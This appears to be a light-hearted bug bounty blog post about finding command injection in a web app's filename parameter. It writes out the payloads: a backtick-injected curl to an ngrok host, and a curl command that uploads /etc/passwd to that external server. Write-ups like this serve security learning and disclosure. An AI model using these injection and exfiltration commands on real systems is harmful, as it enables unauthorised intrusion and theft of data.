Member-only story
When Life Throws Errors, I Throw Commands: My Command Injection Bug🤓
Hey there..! 👋
Free Link🎈
I wake up every day hoping to fix my life, but instead, I end up fixing someone else’s web app vulnerabilities. 😅
After a tragic attempt at making breakfast, how my boring day turned into a hacking rollercoaster! 🎢
🕵️ The Discovery: Filename or Commandline?
I was casually testing a web app when I stumbled upon a parameter named filename. Out of curiosity (and because I had nothing better to do), I entered this:
filename=burp.comGuess what? I received an SMTP request from my Burp Collaborator server! 💥
At that moment, my brain went:
“Hold on… is this thing vulnerable to Command Injection?!”
Spoiler alert: It was.
- “I can’t control my life, but I can control servers with
curl."
🔑 The Exploitation: Curling My Way to Victory
I quickly spun up an ngrok server to catch outgoing requests:
./ngrok http 80Then, I tried injecting a curl command into the vulnerable parameter:
filename=`curl bowbowbow.ngrok.io`Boom! I got a request on my ngrok server. It was game on from that moment.
📂 Dumping /etc/passwd (The Hacker’s Rite of Passage)
Feeling like a cyber ninja, I went one step further. I tried to see if I could grab system files, and this command did the trick:
curl -F shl=@/etc/passwd bowbowbow.ngrok.ioSeconds later, the /etc/passwd file landed on my ngrok server. At that point, I just stared at my terminal, grinning like a maniac. 😈
Lesson of the day: A single parameter can make or break an entire system.
